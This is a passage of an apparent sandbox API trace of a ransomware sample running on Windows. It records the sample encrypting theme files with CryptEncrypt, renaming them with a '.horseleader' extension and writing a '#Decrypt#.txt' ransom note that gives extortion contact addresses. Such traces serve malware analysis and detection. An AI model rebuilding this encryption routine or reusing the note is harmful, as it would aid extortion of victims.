returned 0x0 
[0246.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.263] lstrlenW (lpString=".testttjffg") returned 11 [0246.263] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.263] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.263] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0246.264] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.264] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=31837) returned 1 [0246.264] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.266] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.267] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.267] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2c5d, lpOverlapped=0x0) returned 1 [0246.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd3a3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2c5d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2c5d, lpOverlapped=0x0) returned 1 [0246.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.268] CloseHandle (hObject=0x1a4) returned 1 [0246.268] GetProcessHeap () returned 0x780000 [0246.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.269] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.horseleader") returned 93 [0246.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.horseleader")) returned 1 [0246.269] GetProcessHeap () returned 0x780000 [0246.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.269] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7c5d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.270] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.270] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\#Decrypt#.txt") returned 82 [0246.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.270] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.272] lstrlenA (lpString="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") returned 1368 [0246.272] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.272] CloseHandle (hObject=0x158) returned 1 [0246.272] GetProcessHeap () returned 0x780000 [0246.272] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.272] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0246.272] lstrcmpiW (lpString1="BREEZE", lpString2="Windows") returned -1 [0246.272] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned 66 [0246.272] lstrcmpW (lpString1="BREEZE", lpString2=".") returned 1 [0246.272] lstrcmpW (lpString1="BREEZE", lpString2="..") returned 1 [0246.272] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.272] GetProcessHeap () returned 0x780000 [0246.272] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.273] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*") returned 68 [0246.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.274] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\.") returned 68 [0246.274] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.274] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.274] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\..") returned 69 [0246.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0246.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.274] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea563500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a61ad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea563500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1a537, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BREEZE.ELM", cAlternateFileName="")) returned 1 [0246.274] lstrcmpiW (lpString1="BREEZE.ELM", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0246.274] StrStrIW (lpFirst="BREEZE.ELM", lpSrch=".horseleader") returned 0x0 [0246.274] lstrcmpW (lpString1="BREEZE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.274] lstrcmpW (lpString1="BREEZE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.274] lstrlenW (lpString=".testttjffg") returned 11 [0246.274] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.274] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.274] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0246.275] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0246.275] StrStrW (lpFirst="BREEZE.ELM", lpSrch=".txt") returned 0x0 [0246.275] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=107831) returned 1 [0246.275] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.275] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.278] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.278] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xaa9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x15537, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.282] CloseHandle (hObject=0x1a4) returned 1 [0246.282] GetProcessHeap () returned 0x780000 [0246.282] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.282] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.horseleader") returned 89 [0246.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm.horseleader")) returned 1 [0246.283] GetProcessHeap () returned 0x780000 [0246.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6003c730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1c2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BREEZE.INF", cAlternateFileName="")) returned 1 [0246.283] lstrcmpiW (lpString1="BREEZE.INF", lpString2="Windows") returned -1 [0246.283] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0246.283] StrStrIW (lpFirst="BREEZE.INF", lpSrch=".horseleader") returned 0x0 [0246.283] lstrcmpW (lpString1="BREEZE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.283] lstrcmpW (lpString1="BREEZE.INF", lpString2="_uninstalling_.png") returned 1 [0246.284] lstrlenW (lpString=".testttjffg") returned 11 [0246.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF", lpSrch=".testttjffg") returned 0x0 [0246.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0246.286] StrStrW (lpFirst="BREEZE.INF", lpSrch=".txt") returned 0x0 [0246.286] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=450) returned 1 [0246.286] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1c2, lpOverlapped=0x0) returned 1 [0246.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1c2, lpOverlapped=0x0) returned 1 [0246.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.288] CloseHandle (hObject=0x1a4) returned 1 [0246.288] GetProcessHeap () returned 0x780000 [0246.288] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.288] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF.horseleader") returned 89 [0246.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf.horseleader")) returned 1 [0246.291] GetProcessHeap () returned 0x780000 [0246.291] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.291] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaa2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.291] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.292] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0246.292] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.292] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.292] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.292] lstrlenW (lpString=".testttjffg") returned 11 
[0246.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0246.295] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.295] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2722) returned 1 [0246.295] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xaa2, lpOverlapped=0x0) returned 1 [0246.298] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff55e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xaa2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xaa2, lpOverlapped=0x0) returned 1 [0246.298] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, 
